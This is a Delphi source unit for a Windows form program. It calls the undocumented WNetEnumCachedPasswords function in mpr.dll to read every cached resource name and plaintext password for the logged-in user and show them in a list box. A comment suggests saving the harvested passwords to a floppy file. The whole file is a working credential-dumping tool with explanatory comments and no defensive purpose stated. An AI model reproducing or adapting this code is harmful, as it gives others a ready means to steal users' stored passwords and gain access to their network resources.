unit Unit1;

interface

uses
  Windows, Messages, SysUtils, Classes, Graphics, Controls, Forms, Dialogs,
  StdCtrls;

type
  TfrmMain = class(TForm)
    btnGetPass: TButton;
    lbPasswords: TListBox;
    procedure btnGetPassClick(Sender: TObject);
  private
    { Private declarations }
  public
    { Public declarations }
  end;

var
  frmMain: TfrmMain;

{Foreward declaration for WNetEnumCachedPasswords so it has a broader scope}
function WNetEnumCachedPasswords(lp: lpStr; w: Word; b: Byte; PC: PChar; dw: DWord): Word; stdcall;

implementation

{$R *.DFM}

type
  PtrCacheEntry= ^PASSWORD_CACHE_ENTRY; {Pointer type for the record type needed by WNetEnumCachedPasswords (Te paramater x in function pce is of pointer type)}
  PASSWORD_CACHE_ENTRY =record {Record needed for WNetEnumCachedPasswords to fill in with information about cached passwords when the pce function is called}
    cbEntry:Word; // size of this entry, in bytes
    cbResource:Word; // size of resource name, in bytes (number of characters)
    cbPassword:Word; // size of password, in bytes (number of characters)
    iEntry:byte; // entry index
    nType:byte; // type of entry
    abResource:array[0..1024] of byte; // containts Resource data (user name and passwords) password immediately follows resource name.
  end;
var
  cnt:integer = 0; {Registers how many times pce is called, which is the number of password resources stored for the logged user}

{Actual external call to de magic function WNetEnumCachedPasswords. It is located in mpr.dll. It must be stdcalled}
function WNetEnumCachedPasswords; external mpr; stdcall;

{This function is called by WNetEnumCachedPasswords when its memory address is passed as the fourth parameter}
{WNetEnumCachedPasswords fills the parameters with the needed data and in the block of this function we have to specify how we want to handle the given information (which is in the record X)}
{This function is called by WNetEnumCachedPasswords as many times as password resources are}
function pce(x: PtrCacheEntry; l:DWORD):longbool; stdcall;
var
  i: integer; //Used as counter for the "for" loops.
  ResourceBuf: string; //Used to store the cntth resource name
  PasswordBuf: string; //Used to store the password for the corresponding resource name
begin
  Inc(cnt); {Increase cnt variable by one ;-)}

  for i:=0 to x.cbResource-1 do //cycle from 0 to the length of the resource name string
    ResourceBuf:=ResourceBuf+chr(x.abresource[i]); //assign the character in turn (converted from byte to char first)

  for i:=0 to x.cbPassword-1 do //cycle from 0 to the length of the resource password string
    PasswordBuf:=PasswordBuf+chr(x.abresource[x.cbResource+i]); //assign the character in turn (converted from byte to char first)

  {Add passwords to List Box. The could also be added to any other control. Even the hard disk, with a few more lines}
  frmMain.lbPasswords.Items.Add(ResourceBuf+': '+PasswordBuf);
  {Form1.ListBox1.Items.SaveToFile(A:\passwords.txt);  <-- This is what I am talking about ;-)}

  pce:= TRUE; {Return value should alway be TRUE}
end;

procedure TfrmMain.btnGetPassClick(Sender: TObject);
begin
  {Call to THE function}
  WNetEnumCachedPasswords(nil,0, $ff, @pce, 0);
  {Error handling block}
  if cnt = 0 then
    MessageDlg('No passwords found. Probably password caching was not used or user is not logged in.',mtInformation,[mbOk],0)
  else
    cnt:=0; //reset counter
end;

end.
